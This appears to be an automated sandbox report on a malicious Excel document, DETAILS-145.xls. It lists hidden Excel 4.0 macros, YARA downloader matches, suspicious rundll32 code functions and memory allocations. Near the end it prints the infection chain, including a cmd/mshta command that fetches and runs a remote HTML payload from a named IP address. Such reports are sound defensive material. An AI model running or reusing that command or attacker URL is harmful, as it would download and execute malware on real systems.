Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B8D95 11_2_001B8D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BFD8C 11_2_001BFD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BAE9A 11_2_001BAE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CEE94 11_2_001CEE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CBE8C 11_2_001CBE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B6ED6 11_2_001B6ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CFF31 11_2_001CFF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B1F9B 11_2_001B1F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B3FB8 11_2_001B3FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B2FA1 11_2_001B2FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BCFCE 11_2_001BCFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00785CF9 12_2_00785CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007770ED 12_2_007770ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007874DD 12_2_007874DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007804B8 12_2_007804B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078E498 12_2_0078E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077EC9B 12_2_0077EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078EE94 12_2_0078EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078BE8C 12_2_0078BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00791B54 12_2_00791B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077F93D 12_2_0077F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00783512 12_2_00783512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00779700 12_2_00779700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00778D95 12_2_00778D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078B391 12_2_0078B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00779A7D 12_2_00779A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00793672 12_2_00793672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078026B 12_2_0078026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0079146E 12_2_0079146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00786864 12_2_00786864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077E86A 12_2_0077E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00790867 12_2_00790867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077C850 12_2_0077C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00778650 12_2_00778650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077CA43 12_2_0077CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077E243 12_2_0077E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00785040 12_2_00785040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078363D 12_2_0078363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00772830 12_2_00772830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00781831 12_2_00781831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078A429 12_2_0078A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078542E 12_2_0078542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077B821 12_2_0077B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00776C29 12_2_00776C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078561F 12_2_0078561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00776A1F 12_2_00776A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077B41A 12_2_0077B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007788F4 12_2_007788F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007864F1 12_2_007864F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007744FA 12_2_007744FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00776ED6 12_2_00776ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007904DE 12_2_007904DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007768DE 12_2_007768DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078ACD3 12_2_0078ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078D8D7 12_2_0078D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078129C 12_2_0078129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078109E 12_2_0078109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077AE9A 12_2_0077AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078CC89 12_2_0078CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00776083 12_2_00776083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00788D71 12_2_00788D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077777B 12_2_0077777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077AB66 12_2_0077AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00790D5B 12_2_00790D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077F154 12_2_0077F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00771950 12_2_00771950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00782753 12_2_00782753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078A156 12_2_0078A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00784B56 12_2_00784B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00783D41 12_2_00783D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077194C 12_2_0077194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077BB4B 12_2_0077BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00780946 12_2_00780946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078FF31 12_2_0078FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00780D33 12_2_00780D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077472E 12_2_0077472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077911A 12_2_0077911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077BD0F 12_2_0077BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077C309 12_2_0077C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078EBFF 12_2_0078EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00782BF6 12_2_00782BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078D3C8 12_2_0078D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00787BCA 12_2_00787BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007845CD 12_2_007845CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077CFCE 12_2_0077CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00773FB8 12_2_00773FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078C9A9 12_2_0078C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007899AA 12_2_007899AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00772FA1 12_2_00772FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007841A7 12_2_007841A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00791993 12_2_00791993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00771F9B 12_2_00771F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00777B82 12_2_00777B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078C38F 12_2_0078C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077F58F 12_2_0077F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077FD8C 12_2_0077FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00789186 12_2_00789186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00605CF9 14_2_00605CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F9700 14_2_005F9700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00606864 14_2_00606864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00610867 14_2_00610867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060026B 14_2_0060026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FC850 14_2_005FC850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F8650 14_2_005F8650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0061146E 14_2_0061146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00613672 14_2_00613672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FCA43 14_2_005FCA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FE243 14_2_005FE243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00605040 14_2_00605040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F9A7D 14_2_005F9A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FE86A 14_2_005FE86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F6A1F 14_2_005F6A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FB41A 14_2_005FB41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060A429 14_2_0060A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060542E 14_2_0060542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00601831 14_2_00601831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060363D 14_2_0060363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F2830 14_2_005F2830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F6C29 14_2_005F6C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FB821 14_2_005FB821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060561F 14_2_0060561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F68DE 14_2_005F68DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F6ED6 14_2_005F6ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_006064F1 14_2_006064F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F44FA 14_2_005F44FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F88F4 14_2_005F88F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F70ED 14_2_005F70ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060ACD3 14_2_0060ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060D8D7 14_2_0060D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_006074DD 14_2_006074DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_006104DE 14_2_006104DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FEC9B 14_2_005FEC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FAE9A 14_2_005FAE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_006004B8 14_2_006004B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F6083 14_2_005F6083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060CC89 14_2_0060CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060BE8C 14_2_0060BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060EE94 14_2_0060EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060E498 14_2_0060E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060129C 14_2_0060129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060109E 14_2_0060109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FF154 14_2_005FF154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F1950 14_2_005F1950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00608D71 14_2_00608D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F194C 14_2_005F194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FBB4B 14_2_005FBB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00603D41 14_2_00603D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F777B 14_2_005F777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00600946 14_2_00600946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00602753 14_2_00602753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00611B54 14_2_00611B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060A156 14_2_0060A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00604B56 14_2_00604B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FAB66 14_2_005FAB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00610D5B 14_2_00610D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F911A 14_2_005F911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FBD0F 14_2_005FBD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060FF31 14_2_0060FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00600D33 14_2_00600D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FC309 14_2_005FC309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FF93D 14_2_005FF93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F472E 14_2_005F472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00603512 14_2_00603512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FCFCE 14_2_005FCFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00602BF6 14_2_00602BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060EBFF 14_2_0060EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060D3C8 14_2_0060D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00607BCA 14_2_00607BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_006045CD 14_2_006045CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F1F9B 14_2_005F1F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_006041A7 14_2_006041A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060C9A9 14_2_0060C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F8D95 14_2_005F8D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_006099AA 14_2_006099AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FF58F 14_2_005FF58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005FFD8C 14_2_005FFD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F7B82 14_2_005F7B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00609186 14_2_00609186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F3FB8 14_2_005F3FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060C38F 14_2_0060C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060B391 14_2_0060B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00611993 14_2_00611993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F2FA1 14_2_005F2FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001DEC9B 15_2_001DEC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001EE498 15_2_001EE498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001EEE94 15_2_001EEE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001EBE8C 15_2_001EBE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E04B8 15_2_001E04B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E74DD 15_2_001E74DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E5CF9 15_2_001E5CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D70ED 15_2_001D70ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E3512 15_2_001E3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D9700 15_2_001D9700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001DF93D 15_2_001DF93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001F1B54 15_2_001F1B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D8D95 15_2_001D8D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001EB391 15_2_001EB391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E561F 15_2_001E561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D6A1F 15_2_001D6A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001DB41A 15_2_001DB41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E363D 15_2_001E363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D2830 15_2_001D2830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E1831 15_2_001E1831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E542E 15_2_001E542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D6C29 15_2_001D6C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001EA429 15_2_001EA429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001DB821 15_2_001DB821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001DC850 15_2_001DC850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D8650 15_2_001D8650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001DCA43 15_2_001DCA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E5040 15_2_001E5040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001DE243 15_2_001DE243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D9A7D 15_2_001D9A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001F3672 15_2_001F3672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001F146E 15_2_001F146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E026B 15_2_001E026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001DE86A 15_2_001DE86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001F0867 15_2_001F0867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E6864 15_2_001E6864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E109E 15_2_001E109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E129C 15_2_001E129C
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 54C4.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: DETAILS-145.xls Macro extractor: Sheet name: Macro1
Source: DETAILS-145.xls Macro extractor: Sheet name: Macro1
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077C67D DeleteService, 12_2_0077C67D
Yara signature match
Source: DETAILS-145.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: DETAILS-145.xls, type: SAMPLE Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Wlnljconerohcjaz\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: DETAILS-145.xls OLE indicator, VBA macros: true
Source: DETAILS-145.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@29/9@2/36
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: DETAILS-145.xls OLE indicator, Workbook stream: true
Source: DETAILS-145.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: DETAILS-145.xls ReversingLabs: Detection: 34%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....................................}..v.....^......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k..... ..............................}..v....(_......0.................q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................g..k....................................}..v....`k......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................g..k......q.............................}..v.....k......0...............(.q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............7..k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............7..k....X.q.............................}..v............0.................q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'..................k....E...............................}..v....H8......0.................q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+..................k....E...............................}..v.....v......0.................q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0.......................:....................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
